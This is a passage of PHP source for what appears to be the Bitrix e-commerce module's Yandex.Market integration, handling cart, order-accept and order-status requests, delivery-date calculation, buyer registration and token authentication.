'filter'=>array('=CODE' => static::TRADING_PLATFORM_CODE)
));
$settings = $settingsRes->fetch();
if(!$settings || !is_array($settings))
$settings = array();
}
return $settings;
}
/**
* Returns yandex-market settings for concrete site
* @param $siteId string Site idenifier
* @param bool $cached Return cached or ont value
* @return array
*/
public static function getSettingsBySiteId($siteId, $cached = true)
{
$settings = static::getSettings($cached);
return isset($settings["SETTINGS"][$siteId]) ? $settings["SETTINGS"][$siteId] : array();
}
/**
* Saves settings
* @param $arSettings array Settings array to save
* @return bool
*/
public static function saveSettings($arSettings)
{
if(!is_array($arSettings))
return false;
$result = true;
foreach ($arSettings as $siteId => $siteSett)
{
if(isset($siteSett["OUTLETS_IDS"]) && is_array($siteSett["OUTLETS_IDS"]))
{
$newOutletsIds = array();
foreach ($siteSett["OUTLETS_IDS"] as $outletId)
if(strlen($outletId) > 0)
$newOutletsIds[] = $outletId;
$arSettings[$siteId]["OUTLETS_IDS"] = $newOutletsIds;
}
if(isset($arSettings[$siteId]["DELIVERIES"]) && is_array($arSettings[$siteId]["DELIVERIES"]))
{
foreach($arSettings[$siteId]["DELIVERIES"] as $id => $type)
{
if(strlen($type) <= 0)
{
unset($arSettings[$siteId]["DELIVERIES"][$id]);
unset($arSettings[$siteId]["DLV_PS"][$id]);
continue;
}
foreach(self::getExistPaymentMethods() as $methodIdx => $method)
if(!isset($arSettings[$siteId]["DLV_PS"][$id][$methodIdx]) || $arSettings[$siteId]["DLV_PS"][$id][$methodIdx] != 'Y')
$arSettings[$siteId]["DLV_PS"][$id][$methodIdx] = 'N';
}
}
}
$settings = static::getSettings(false);
if(!empty($settings))
{
if(is_array($settings))
$result = Bitrix\Sale\TradingPlatformTable::update(
YMarket\YandexMarket::getInstance()->getId(),
array("SETTINGS" => $arSettings)
);
}
else
{
$result = false;
}
return $result;
}
/**
* @param int $period
* @param string $type
* @return DateInterval
*/
public function getTimeInterval($period, $type)
{
$interval = 'P';
if($type == 'H' || $type == 'MIN')
$interval .= 'T';
$interval .= strval(intval($period));
if($type == 'MIN')
$type = 'M';
$interval .= $type;
return new DateInterval($interval);
}
/**
* @param DateTime $today
* @param DateTime $nextDate
* @return bool
*/
protected function checkTimeInterval($today, $nextDate)
{
$interval = $today->diff($nextDate);
return (intval($interval->format('%a')) <= 92);
}
/**
* @param int $from
* @param int $to
* @param string $type
* @return array
*/
protected function getDeliveryDates($from, $to, $type)
{
$from = intval($from);
$to = intval($to);
$arResult = array();
if($from <= $to)
{
$today = new DateTime('now', new DateTimeZone('Europe/Moscow'));
$dateFrom = new DateTime('now', new DateTimeZone('Europe/Moscow'));
$dateFrom->add($this->getTimeInterval($from, $type));
if($this->checkTimeInterval($today, $dateFrom))
{
$arResult["fromDate"] = $dateFrom->format(self::DATE_FORMAT);
$dateTo = $today->add($this->getTimeInterval($to, $type));
if($this->checkTimeInterval($today, $dateTo))
$arResult["toDate"] = $dateTo->format(self::DATE_FORMAT);
}
}
return $arResult;
}
/**
* @return array
*/
protected function getPaymentMethods()
{
$result = array();
foreach ($this->mapPaySystems as $psType => $psId)
if(isset($psId) && intval($psId) > 0)
$result[] = $psType;
return $result;
}
/**
* @param array $arPostData
* @return bool
*/
protected function checkCartStructure($arPostData)
{
return isset($arPostData["cart"])
&& isset($arPostData["cart"]["items"])
&& is_array($arPostData["cart"]["items"])
&& isset($arPostData["cart"]["currency"])
&& isset($arPostData["cart"]["delivery"])
&& is_array($arPostData["cart"]["delivery"]);
}
/**
* POST /cart
* max timeout 5,5s.
* @param array $arPostData
* @return array
* @throws \Bitrix\Main\ArgumentNullException
*/
protected function processCartRequest($arPostData)
{
if(!$this->checkCartStructure($arPostData))
return $this->processError(self::ERROR_STATUS_400, GetMessage("SALE_YMH_ERROR_BAD_STRUCTURE"));
$result = array(
"cart" => array(
"items" => array(),
"paymentMethods" => array(),
"deliveryOptions" => array()
)
);
$locationId = 0;
if(strlen($this->orderProps["LOCATION"]) > 0)
{
$locationId = $this->locationMapper->getLocationId($arPostData["cart"]["delivery"]["region"]);
if(intval($locationId) <= 0)
{
$this->log(
self::LOG_LEVEL_INFO,
"YMARKET_LOCATION_MAPPING",
$arPostData["cart"]["delivery"]["region"]["name"],
GetMessage("SALE_YMH_LOCATION_NOT_FOUND")
);
return $result;
}
}
$properties = $this->makeAdditionalOrderProps(
$arPostData["cart"]["delivery"]["address"],
array(),
'',
'',
$locationId
);
$res = \Bitrix\Sale\TradingPlatform\YMarket\Order::create(array(
'CURRENCY' => $arPostData['cart']['currency'],
'SITE_ID' => $this->siteId,
'PERSON_TYPE_ID' => $this->personTypeId,
'PROPERTIES' => $properties,
'CART_ITEMS' => $arPostData['cart']['items']
));
if(!$res->isSuccess())
{
$this->log(
self::LOG_LEVEL_ERROR,
"YMARKET_ORDER_CREATE_ERROR",
'processCartRequest',
implode('; ',$res->getErrorMessages())
);
return $result;
}
$data = $res->getData();
/** @var \Bitrix\Sale\Order $order */
$order = $data['ORDER'];
$basket = $order->getBasket();
$resultItems = array();
$items = $arPostData['cart']['items'];
$itemKeyToBasketCode = array_flip($data['ITEMS_MAP']);
/** @var \Bitrix\Sale\BasketItem $basketItem */
foreach($items as $itemKey => $item)
{
$price = 0;
$count = 0;
if(!empty($itemKeyToBasketCode[$itemKey]))
{
$basketCode = $itemKeyToBasketCode[$itemKey];
$basketItem = $basket->getItemByBasketCode($basketCode);
if(!$basketItem)
continue;
$price = round(floatval($basketItem->getPrice()), 2);
if($price <= 0)
continue;
$count = $basketItem->getQuantity();
}
$resItem = array(
'feedId' => $item['feedId'],
'offerId' => $item['offerId'],
'count' => $count,
'delivery' => $count > 0 ? TRUE : FALSE
);
if($count > 0)
$resItem['price'] = $price;
$resultItems[] = $resItem;
}
$shipment = YMarket\Order::createShipment($order);
YMarket\Order::createPayment($order);
$deliveryObjs = Delivery\Services\Manager::getRestrictedObjectsList(
$shipment,
Delivery\Restrictions\Manager::MODE_CLIENT
);
$deliveryOptions = array();
/** @var Delivery\Services\Base $delivery */
foreach($deliveryObjs as $delivery)
{
if(empty($this->mapDelivery[$delivery->getId()]))
continue;
$orderClone = $order->createClone();
$clonedShipment = null;
$orderClone->isStartField();
foreach ($orderClone->getShipmentCollection() as $shp)
{
if($shp->isSystem())
continue;
$clonedShipment = $shp;
break;
}
/** @var \Bitrix\Sale\Shipment $clonedShipment*/
$clonedShipment->setDeliveryService($delivery);
$deliveryCalcRes = $orderClone->getShipmentCollection()->calculateDelivery();
if(!$deliveryCalcRes->isSuccess())
continue;
$orderClone->doFinalAction(true);
$calcResult = $clonedShipment->calculateDelivery();
if(!$calcResult->isSuccess())
continue;
$dateFrom = $calcResult->getPeriodFrom();
$dateTo = $calcResult->getPeriodTo();
if($dateFrom === null)
$dateFrom = $this->defaultDeliveryPeriodFrom;
if($dateTo === null)
$dateTo = $this->defaultDeliveryPeriodTo;
$arDates = $this->getDeliveryDates($dateFrom, $dateTo, $calcResult->getPeriodType());
if(!empty($arDates))
{
$deliveryType = $this->mapDelivery[$delivery->getId()];
$arDeliveryTmp = array(
"id" => $delivery->getId(),
"type" => $deliveryType,
"serviceName" => substr($delivery->getNameWithParent(), 0, 50),
"price" => round(floatval($orderClone->getDeliveryPrice()), 2),
"dates" => $arDates
);
$dlvToPs = array();
$payMethods = self::getExistPaymentMethods();
if(!empty($this->deliveryToPaysystem[$delivery->getId()]) && is_array($this->deliveryToPaysystem[$delivery->getId()]))
foreach($this->deliveryToPaysystem[$delivery->getId()] as $methodIdx => $value)
if($value == 'Y' && !empty($payMethods[$methodIdx]))
$dlvToPs[] = $payMethods[$methodIdx];
if(!empty($dlvToPs))
$arDeliveryTmp["paymentMethods"] = $dlvToPs;
if($deliveryType == "PICKUP" && !empty($this->outlets))
foreach($this->outlets as $outlet)
$arDeliveryTmp["outlets"][] = array("id" => intval($outlet));
$deliveryOptions[] = $arDeliveryTmp;
}
}
if(!empty($resultItems) && !empty($deliveryOptions))
{
$result['cart']['items'] = $resultItems;
$result['cart']['deliveryOptions'] = $deliveryOptions;
$result['cart']['paymentMethods'] = $this->getPaymentMethods();
}
return $result;
}
/**
* @param string $eventName
* @param array $params
* @return mixed
*/
protected function processCustomEvents($eventName, array $params)
{
$event = new Event('sale', $eventName, $params);
$event->send();
$resultList = $event->getResults();
$result = $params["RESULT"];
if (is_array($resultList) && !empty($resultList))
{
foreach ($resultList as &$eventResult)
{
if ($eventResult->getType() != EventResult::SUCCESS)
continue;
$params = $eventResult->getParameters();
if(isset($params["RESULT"]))
$result = $params["RESULT"];
}
}
return $result;
}
/**
* @param array $arPostData
* @return bool
*/
protected function checkOrderAcceptStructure($arPostData)
{
return isset($arPostData["order"])
&& isset($arPostData["order"]["id"])
&& isset($arPostData["order"]["currency"])
&& isset($arPostData["order"]["fake"])
&& isset($arPostData["order"]["items"]) && is_array($arPostData["order"]["items"])
&& isset($arPostData["order"]["delivery"]) && is_array($arPostData["order"]["delivery"]);
}
/**
* @param array $buyer
* @param array $address
* @param array $region
* @return bool|int|string
*/
protected function createUser($buyer, $address, $region)
{
$userRegister = array(
"NAME" => $buyer["firstName"],
"PERSONAL_MOBILE" => $buyer["phone"]
);
if(isset($buyer["lastName"]))
$userRegister["LAST_NAME"] = $buyer["lastName"];
if(isset($buyer["middleName"]))
$userRegister["SECOND_NAME"] = $buyer["middleName"];
$arPersonal = array();
if(strlen($buyer["phone"]) > 0)
$arPersonal = array("PERSONAL_MOBILE" => $buyer["phone"]);
$arErrors = array();
$userId = CSaleUser::DoAutoRegisterUser(
$buyer["email"],
$userRegister,
$this->siteId,
$arErrors,
$arPersonal);
$this->log(
empty($arErrors) ? self::LOG_LEVEL_INFO : self::LOG_LEVEL_ERROR,
"YMARKET_USER_CREATE",
$userId ? $userId : print_r($buyer, true),
empty($arErrors) ? GetMessage("SALE_YMH_USER_PROFILE_CREATED") : print_r($arErrors, true)
);
return $userId;
}
/**
* @param array $address
* @param array $buyer
* @param int $psId
* @param int $deliveryId
* @param int $locationId
* @return array
*/
protected function makeAdditionalOrderProps($address, $buyer, $psId, $deliveryId, $locationId)
{
$psId = intval($psId);
$arResult = array();
$arPropFilter = array(
"PERSON_TYPE_ID" => $this->personTypeId,
"ACTIVE" => "Y"
);
if ($psId != 0)
{
$arPropFilter["RELATED"]["PAYSYSTEM_ID"] = $psId;
$arPropFilter["RELATED"]["TYPE"] = "WITH_NOT_RELATED";
}
if (strlen($deliveryId) > 0)
{
$arPropFilter["RELATED"]["DELIVERY_ID"] = $deliveryId;
$arPropFilter["RELATED"]["TYPE"] = "WITH_NOT_RELATED";
}
$dbOrderProps = CSaleOrderProps::GetList(
array(),
$arPropFilter,
false,
false,
array("ID", "CODE")
);
while ($arOrderProps = $dbOrderProps->Fetch())
{
if(strlen($this->orderProps["FIO"]) > 0 && $arOrderProps["CODE"] == $this->orderProps["FIO"] && !empty($buyer))
{
$fio = $buyer["firstName"];
if(isset($buyer["middleName"]))
$fio .= ' '.$buyer["middleName"];
if(isset($buyer["lastName"]))
$fio .= ' '.$buyer["lastName"];
$arResult[$arOrderProps["ID"]] = $fio;
}
elseif(strlen($this->orderProps["EMAIL"]) > 0 && $arOrderProps["CODE"] == $this->orderProps["EMAIL"] && isset($buyer["email"]))
$arResult[$arOrderProps["ID"]] = $buyer["email"];
elseif(strlen($this->orderProps["PHONE"]) > 0 && $arOrderProps["CODE"] == $this->orderProps["PHONE"] && isset($buyer["phone"]))
$arResult[$arOrderProps["ID"]] = $buyer["phone"];
elseif(strlen($this->orderProps["ZIP"]) > 0 && $arOrderProps["CODE"] == $this->orderProps["ZIP"] && isset($address["postcode"]))
$arResult[$arOrderProps["ID"]] = $address["postcode"];
elseif(strlen($this->orderProps["CITY"]) > 0 && $arOrderProps["CODE"] == $this->orderProps["CITY"])
$arResult[$arOrderProps["ID"]] = $address["city"];
elseif(strlen($this->orderProps["LOCATION"]) > 0 && $arOrderProps["CODE"] == $this->orderProps["LOCATION"])
{
if($locationId > 0)
{
$dbRes = \Bitrix\Sale\Location\LocationTable::getById($locationId);
if($loc = $dbRes->fetch())
$arResult[$arOrderProps["ID"]] = $loc['CODE'];
}
}
elseif(strlen($this->orderProps["ADDRESS"]) > 0 && $arOrderProps["CODE"] == $this->orderProps["ADDRESS"])
$arResult[$arOrderProps["ID"]] = $this->createAddressString($address);
}
return $arResult;
}
protected function createAddressString($address)
{
$strAddr = "";
if(isset($address["postcode"]))
$strAddr .= $address["postcode"].", ";
$strAddr .= $address["country"].", ".$address["city"].", ";
if(isset($address["street"]))
$strAddr .= GetMessage("SALE_YMH_ADDRESS_STREET")." ".$address["street"].", ";
if(isset($address["subway"]))
$strAddr .= GetMessage("SALE_YMH_ADDRESS_SUBWAY")." ".$address["subway"].", ";
$strAddr .= GetMessage("SALE_YMH_ADDRESS_HOUSE")." ".$address["house"];
if(isset($address["block"]))
$strAddr .= ", ".GetMessage("SALE_YMH_ADDRESS_BLOCK")." ".$address["block"];
if(isset($address["entrance"]))
$strAddr .= ", ".GetMessage("SALE_YMH_ADDRESS_ENTRANCE")." ".$address["entrance"];
if(isset($address["entryphone"]))
$strAddr .= ", ".GetMessage("SALE_YMH_ADDRESS_ENTRYPHONE")." ".$address["entryphone"];
if(isset($address["floor"]))
$strAddr .= ", ".GetMessage("SALE_YMH_ADDRESS_FLOOR")." ".$address["floor"];
if(isset($address["apartment"]))
$strAddr .= ", ".GetMessage("SALE_YMH_ADDRESS_APARTMENT")." ".$address["apartment"];
if(isset($address["recipient"]))
$strAddr .= ", ".GetMessage("SALE_YMH_ADDRESS_RECIPIENT")." ".$address["recipient"];
if(isset($address["phone"]))
$strAddr .= ", ".GetMessage("SALE_YMH_ADDRESS_PHONE")." ".$address["phone"];
return $strAddr;
}
/**
* POST /order/accept timeout 10s
* @param array $arPostData
* @return array
* @throws Exception
* @throws \Bitrix\Main\ArgumentException
* @throws \Bitrix\Main\ArgumentNullException
* @throws \Bitrix\Main\LoaderException
*/
protected function processOrderAcceptRequest($arPostData)
{
if(!$this->checkOrderAcceptStructure($arPostData))
return $this->processError(self::ERROR_STATUS_400, GetMessage("SALE_YMH_ERROR_BAD_STRUCTURE"));
$deliveryId = $arPostData["order"]["delivery"]["id"];
$paySystemId = $this->mapPaySystems[$arPostData["order"]["paymentMethod"]];
$result = array(
'order' => array(
'accepted' => false,
'reason' => 'OUT_OF_DATE'
)
);
if(!Loader::includeModule('iblock'))
return $result;
if(!Loader::includeModule('catalog'))
return $result;
$dbRes = \Bitrix\Sale\TradingPlatform\OrderTable::getList(array(
"filter" => array(
"TRADING_PLATFORM_ID" => YMarket\YandexMarket::getInstance()->getId(),
"EXTERNAL_ORDER_ID" => $arPostData["order"]["id"]
)
));
$orderId = 0;
if($orderCorrespondence = $dbRes->fetch())
$orderId = $orderCorrespondence["ORDER_ID"];
if($orderId <= 0)
{
$locationId = 0;
if(strlen($this->orderProps["LOCATION"]) > 0)
{
$locationId = $this->locationMapper->getLocationId($arPostData["order"]["delivery"]["region"]);
if(intval($locationId) <= 0)
{
$this->log(
self::LOG_LEVEL_INFO,
"YMARKET_LOCATION_MAPPING",
$arPostData["order"]["delivery"]["region"]["name"],
GetMessage("SALE_YMH_LOCATION_NOT_FOUND")
);
return $result;
}
}
$properties = $this->makeAdditionalOrderProps(
$arPostData["order"]["delivery"]["address"],
array(),
$paySystemId,
$deliveryId,
$locationId
);
$res = \Bitrix\Sale\TradingPlatform\YMarket\Order::create(array(
'CURRENCY' => $arPostData['order']['currency'],
'SITE_ID' => $this->siteId,
'PERSON_TYPE_ID' => $this->personTypeId,
'PROPERTIES' => $properties,
'CART_ITEMS' => $arPostData['order']['items'],
'IS_ACCEPT_OLD_PRICE' => $this->isAcceptOldPrice
));
if(!$res->isSuccess())
{
$this->log(
self::LOG_LEVEL_ERROR,
"YMARKET_ORDER_CREATE_ERROR",
'processOrderAcceptRequest',
implode('; ',$res->getErrorMessages())
);
return $result;
}
$data = $res->getData();
/** @var \Bitrix\Sale\Order $order */
$order = $data['ORDER'];
if(!$this->checkBasketPrice($arPostData['order']['items'], $order))
{
if($this->isAcceptOldPrice == \CSaleYMHandler::ACCEPT_OLD_PRICE)
{
$this->setBasketOldPrice($arPostData['order']['items'], $order);
$order->setField(
"COMMENTS",
GetMessage('SALE_YMARKET_ORDER_PRICE_CHANGED')
);
}
else
{
return $result;
}
}
YMarket\Order::createShipment($order, $deliveryId, $arPostData["order"]["delivery"]["price"]);
YMarket\Order::createPayment($order, $paySystemId);
$order->setField("PRICE", $order->getPrice());
$order->setField("XML_ID", self::XML_ID_PREFIX.$arPostData["order"]["id"]);
/* PRODUCT_XML_ID CATALOG_XML_ID */
$xmls = array();
$productIds = array();
foreach ($arPostData["order"]["items"] as $item)
$productIds[] = $item['offerId'];
$dbRes = \Bitrix\Iblock\ElementTable::getList(array(
'filter' => array(
'=ID' => $productIds
),
'select' => array(
'ID', 'XML_ID',
'IBLOCK_EXTERNAL_ID' => 'IBLOCK.XML_ID',
)
));
$parentsIds = array();
while($iblockElement = $dbRes->fetch())
{
$xmls[$iblockElement['ID']] = array();
if(strlen($iblockElement["XML_ID"]) > 0)
$xmls[$iblockElement['ID']]["PRODUCT_XML_ID"] = $iblockElement["XML_ID"];
if(strlen($iblockElement["IBLOCK_EXTERNAL_ID"]) > 0)
$xmls[$iblockElement['ID']]["CATALOG_XML_ID"] = $iblockElement["IBLOCK_EXTERNAL_ID"];
if(strpos($iblockElement["XML_ID"], '#') === false && $parent = \CCatalogSku::GetProductInfo($iblockElement['ID']))
$parentsIds[$iblockElement['ID']] = $parent['ID'];
}
if(!empty($parentsIds))
{
$dbRes = \Bitrix\Iblock\ElementTable::getList(array(
'filter' => array('=ID' => array_unique($parentsIds)),
'select' => array('ID', 'XML_ID')
));
while($parent = $dbRes->fetch())
{
if(strlen($parent['XML_ID']) <= 0)
continue;
foreach($parentsIds as $childId => $parentId)
if($parentId == $parent['ID'])
$xmls[$childId]["PRODUCT_XML_ID"] = $parent['XML_ID'].'#'.$xmls[$childId]["PRODUCT_XML_ID"];
}
}
/* */
$basket = $order->getBasket();
/** @var \Bitrix\Sale\BasketItem $basketItem */
foreach($basket->getBasketItems() as $basketItem)
{
$productId = $basketItem->getProductId();
if(!empty($xmls[$productId]['PRODUCT_XML_ID']))
$basketItem->setField("PRODUCT_XML_ID", $xmls[$productId]['PRODUCT_XML_ID']);
if(!empty($xmls[$productId]['CATALOG_XML_ID']))
$basketItem->setField("CATALOG_XML_ID", $xmls[$productId]['CATALOG_XML_ID']);
}
if(!empty($arPostData["order"]["notes"]))
$order->setField('USER_DESCRIPTION', $arPostData["order"]["notes"]);
//Let's mark order that we don't have info about buyer yet.
$r = new \Bitrix\Sale\Result();
$r->addWarning(new \Bitrix\Main\Error(GetMessage('SALE_YMH_MARK_BUYER_WAITING'), 'YMARKET_BUYER_INFO_WAITING'));
\Bitrix\Sale\EntityMarker::addMarker($order, $order, $r);
$order->setField('MARKED', 'Y');
$res = $order->save();
if(!$res->isSuccess())
{
$this->log(
self::LOG_LEVEL_ERROR,
"YMARKET_PLATFORM_ORDER_ADD_ERROR",
$arPostData["order"]["id"],
implode('; ', $res->getErrorMessages())
);
return $result;
}
if(Option::get("sale", "account_number_template", "") === "")
$orderId = $order->getId();
else
$orderId = $order->getField('ACCOUNT_NUMBER');
$res = \Bitrix\Sale\TradingPlatform\OrderTable::add(array(
"ORDER_ID" => $res->getId(),
"TRADING_PLATFORM_ID" => YMarket\YandexMarket::getInstance()->getId(),
"EXTERNAL_ORDER_ID" => $arPostData["order"]["id"]
));
if(!$res->isSuccess())
{
$this->log(
self::LOG_LEVEL_ERROR,
"YMARKET_PLATFORM_ORDER_ADD_ERROR",
$arPostData["order"]["id"],
implode('; ', $res->getErrorMessages())
);
return $result;
}
}
$result["order"]["accepted"] = TRUE;
$result["order"]["id"] = '"'.$orderId.'"';
unset($result["order"]["reason"]);
$this->log(
self::LOG_LEVEL_INFO,
"YMARKET_ORDER_CREATE",
$arPostData["order"]["id"],
GetMessage("SALE_YMH_ORDER_CREATED")." ".$orderId
);
return $result;
}
protected function checkBasketPrice(array $items, \Bitrix\Sale\Order $order)
{
$yandexBasketPrice = 0;
foreach($items as $item)
if(isset($item['price']))
$yandexBasketPrice += $item['price']*$item['count'];
return round($order->getBasket()->getPrice(), 2) == round($yandexBasketPrice, 2);
}
protected function setBasketOldPrice(array $items, \Bitrix\Sale\Order $order)
{
$basket = $order->getBasket();
/** @var \Bitrix\Sale\BasketItem $basketItem */
foreach($basket->getBasketItems() as $basketItem)
{
foreach($items as $key => $item)
{
if($item['offerId'] != $basketItem->getProductId())
continue;
$basketItem->setField("CUSTOM_PRICE", 'Y');
$basketItem->setField("PRICE", $item['price']);
unset($items[$key]);
}
}
}
/**
* @param array $arPostData
* @return bool
*/
protected function checkOrderStatusRequest($arPostData)
{
return
(isset($arPostData["order"])
&& isset($arPostData["order"]["id"])
&& isset($arPostData["order"]["currency"])
&& isset($arPostData["order"]["creationDate"])
&& isset($arPostData["order"]["itemsTotal"])
&& isset($arPostData["order"]["total"])
&& isset($arPostData["order"]["status"])
&& isset($arPostData["order"]["fake"])
&& isset($arPostData["order"]["buyer"])
&& isset($arPostData["order"]["items"]) && is_array($arPostData["order"]["items"])
&& isset($arPostData["order"]["delivery"]) && is_array($arPostData["order"]["delivery"])) || true;
}
/**
* POST /order/status timeout 10s
*
* @param array $arPostData
* @return array
* @throws \Bitrix\Main\ArgumentException
* @throws \Bitrix\Main\ArgumentNullException
* @throws \Bitrix\Main\ArgumentOutOfRangeException
*/
protected function processOrderStatusRequest($arPostData)
{
$arResult = array();
if($this->checkOrderStatusRequest($arPostData))
{
$dbOrder = \Bitrix\Sale\Internals\OrderTable::getList(array(
'filter' => array("XML_ID" => self::XML_ID_PREFIX.$arPostData["order"]["id"]),
'select' => array('ID', 'LID', 'XML_ID')
));
if($arOrder = $dbOrder->fetch())
{
$order = \Bitrix\Sale\Order::load($arOrder['ID']);
$reason = "";
switch ($arPostData["order"]["status"])
{
case 'PROCESSING':
$locationId = $this->locationMapper->getLocationId($arPostData["order"]["delivery"]["region"]);
if($locationId === false)
{
$this->log(
self::LOG_LEVEL_INFO,
"YMARKET_LOCATION_MAPPING",
$arPostData["order"]["delivery"]["region"]["name"],
GetMessage("SALE_YMH_LOCATION_NOT_FOUND")
);
}
if(isset($arPostData["order"]["paymentMethod"]) && $arPostData["order"]["paymentMethod"] == "YANDEX")
{
$paymentCollection = $order->getPaymentCollection();
/** @var \Bitrix\Sale\Payment $payment */
if($paymentCollection->count() > 0)
{
foreach ($paymentCollection as $payment)
{
$res = $payment->setPaid("Y");
if(!$res->isSuccess())
{
$this->log(
self::LOG_LEVEL_INFO,
"YMARKET_INCOMING_ORDER_STATUS",
'Set order paid',
implode('; ',$res->getErrorMessages())
);
}
}
}
}
$arOrderPropsValues = $this->makeAdditionalOrderProps(
$arPostData["order"]["delivery"]["address"],
$arPostData["order"]["buyer"],
isset($this->mapPaySystems[$arPostData["order"]["paymentMethod"]]) ? $this->mapPaySystems[$arPostData["order"]["paymentMethod"]] : "",
$arPostData["order"]["delivery"]["id"],
$locationId
);
if(!empty($arOrderPropsValues))
{
$propCollection = $order->getPropertyCollection();
$res = $propCollection->setValuesFromPost(array('PROPERTIES' => $arOrderPropsValues), array());
if(!$res->isSuccess())
{
$this->log(
self::LOG_LEVEL_INFO,
"YMARKET_INCOMING_ORDER_STATUS",
'Set order properties',
implode('; ',$res->getErrorMessages())
);
}
}
if($order->getUserId() == \CSaleUser::GetAnonymousUserID())
{
$userId = $this->createUser($arPostData["order"]["buyer"], null, null);
if(intval($userId) > 0)
{
$order->setFieldNoDemand("USER_ID", $userId);
EntityMarker::deleteByFilter(array(
'=ORDER_ID' => $order->getId(),
'=ENTITY_TYPE' => EntityMarker::ENTITY_TYPE_ORDER,
'=ENTITY_ID' => $order->getId(),
'=CODE' => 'YMARKET_BUYER_INFO_WAITING'
));
$order->setField('MARKED', 'N');
}
}
if(!empty($arPostData["order"]["notes"]) && $order->getField('USER_DESCRIPTION') != $arPostData["order"]["notes"])
$order->setField('USER_DESCRIPTION', $order->getField('USER_DESCRIPTION')."\n".$arPostData["order"]["notes"]);
$res = $order->save();
if(!$res->isSuccess())
{
$this->log(
self::LOG_LEVEL_INFO,
"YMARKET_INCOMING_ORDER_STATUS",
'Save order',
implode('; ',$res->getErrorMessages())
);
}
$this->sendEmailNewOrder($arOrder["ID"], $arPostData["order"]["buyer"]);
if(!empty($arErrors))
{
$this->log(
self::LOG_LEVEL_ERROR,
"YMARKET_INCOMING_ORDER_STATUS",
$arPostData["order"]["id"],
print_r($arErrors, true)
);
}
else
{
$this->log(
self::LOG_LEVEL_INFO,
"YMARKET_INCOMING_ORDER_STATUS",
$arPostData["order"]["id"],
GetMessage("SALE_YMH_INCOMING_ORDER_STATUS_PROCESSING").": ".$arOrder["ID"]
);
}
break;
case 'UNPAID':
case 'DELIVERY':
case 'PICKUP':
case 'DELIVERED ':
case 'RESERVED ':
break;
case 'CANCELLED':
if(isset($arPostData["order"]["substatus"]))
$reason = $arPostData["order"]["substatus"];
break;
default:
$arResult = $this->processError(self::ERROR_STATUS_400, GetMessage("SALE_YMH_ERROR_UNKNOWN_STATUS"));
break;
}
$this->mapYandexStatusToOrder($arOrder, $arPostData["order"]["status"], $reason);
}
}
else
{
$arResult = $this->processError(self::ERROR_STATUS_400, GetMessage("SALE_YMH_ERROR_BAD_STRUCTURE"));
}
return $arResult;
}
/**
* @param string $postData
* @return array
*/
protected function extractPostData($postData)
{
global $APPLICATION;
$arResult = array();
if($this->communicationFormat == self::JSON)
{
$arResult = json_decode($postData, true);
}
if(strtolower(SITE_CHARSET) != 'utf-8')
$arResult = $APPLICATION->ConvertCharsetArray($arResult, 'utf-8', SITE_CHARSET);
return $arResult;
}
/**
* @param array $arData
* @return string
*/
protected function prepareResult($arData)
{
global $APPLICATION;
$result = array();
if(strtolower(SITE_CHARSET) != 'utf-8')
$arData = $APPLICATION->ConvertCharsetArray($arData, SITE_CHARSET, 'utf-8');
if($this->communicationFormat == self::JSON)
{
header('Content-Type: application/json');
$result = json_encode($arData);
}
return $result;
}
/**
* Let's check authorization,
* comparing incoming token with token stored in settings.
* @return bool
*/
public function checkAuth()
{
$incomingToken = "";
if($this->authType == "HEADER")
{
if(isset($_SERVER["REMOTE_USER"]) && strlen($_SERVER["REMOTE_USER"]) > 0)
$incomingToken = $_SERVER["REMOTE_USER"];
elseif(isset($_SERVER["REDIRECT_REMOTE_USER"]) && strlen($_SERVER["REDIRECT_REMOTE_USER"]) > 0)
$incomingToken = $_SERVER["REDIRECT_REMOTE_USER"];
elseif(isset($_SERVER["HTTP_AUTHORIZATION"]) && strlen($_SERVER["HTTP_AUTHORIZATION"]) > 0)
$incomingToken = $_SERVER["HTTP_AUTHORIZATION"];
}
elseif($this->authType == "URL")
{
if(isset($_REQUEST["auth-token"]) && strlen($_REQUEST["auth-token"]) > 0)
$incomingToken = $_REQUEST["auth-token"];
}
if($incomingToken == "" && intval($_SERVER["argc"]) > 0)
{
foreach ($_SERVER["argv"] as $arg)
{
$e = explode("=", $arg);
if(count($e) == 2 && $e[0] == "auth-token")
$incomingToken = $e[1];
}
}
return strlen($incomingToken) > 0 && $incomingToken == $this->yandexToken;
}
/**
* @param string $reqObject
* @param string $method
* @param string $postData
* @return string
*/
public function processRequest($reqObject, $method, $postData)
{
$arResult = array();
$arPostData = $this->extractPostData($postData);
$this->log(
self::LOG_LEVEL_DEBUG,
"YMARKET_INCOMING_REQUEST",
$reqObject.":".$method,
print_r($arPostData, true)
);
if(!$this->isActive())
{
$arResult = $this->processError(self::ERROR_STATUS_503, GetMessage("SALE_YMH_ERROR_OFF"));
}
elseif(!$this->checkAuth())
{
$arResult = $this->processError(self::ERROR_STATUS_403, GetMessage("SALE_YMH_ERROR_FORBIDDEN"));
}
else
{
self::$isYandexRequest = true;
DiscountCouponsManager::init(DiscountCouponsManager::MODE_EXTERNAL);
switch ($reqObject)
{
case 'cart':
$arResult = $this->processCartRequest($arPostData);
break;
case 'order':
if($method == "accept")
$arResult = $this->processOrderAcceptRequest($arPostData);
elseif($method == "status")
$arResult = $this->processOrderStatusRequest($arPostData);
break;
default:
$arResult = $this->processError(self::ERROR_STATUS_400, GetMessage("SALE_YMH_ERROR_UNKNOWN_REQ_OBJ"));
break;
}
}
$this->log(
self::LOG_LEVEL_DEBUG,
"YMARKET_INCOMING_REQUEST_RESULT",
$reqObject.":".$method,
print_r($arResult, true)
);
$arResult = $this->processCustomEvents(
'OnSaleYandexMarketRequest_'.$reqObject.$method,
array(
"POST_DATA" => $arPostData,
"RESULT" => $arResult
));
$arPreparedResult = $this->prepareResult($arResult);
return $arPreparedResult;
}
/**
* @param string $status
* @param string $message
* @return array
*/
protected function processError($status = "", $message = "")
{
if($status != "")
CHTTP::SetStatus($status);
if($message && $this->logLevel >= self::LOG_LEVEL_ERROR)
$this->log(
self::LOG_LEVEL_ERROR,
"YMARKET_REQUEST_ERROR",
"",
$message);
return array("error" => $message);
}
/**
* @param int $orderId
* @param string $status
* @param string $substatus
* @return bool
*/
public function sendStatus($orderId, $status, $substatus = false)
{
global $APPLICATION;
if(
strlen($this->yandexApiUrl) <= 0
|| strlen($this->campaignId) <= 0
|| intval($orderId) <= 0
|| strlen($status) <=0
|| strlen($this->oAuthToken) <=0
|| strlen($this->oAuthClientId) <=0
|| strlen($this->oAuthLogin) <=0
)
return false;
$format = $this->communicationFormat == self::JSON ? 'json' : 'xml';
$url = $this->yandexApiUrl."campaigns/".$this->campaignId."/orders/".$orderId."/status.".$format;
$http = new \Bitrix\Main\Web\HttpClient(array(
"version" => "1.1",
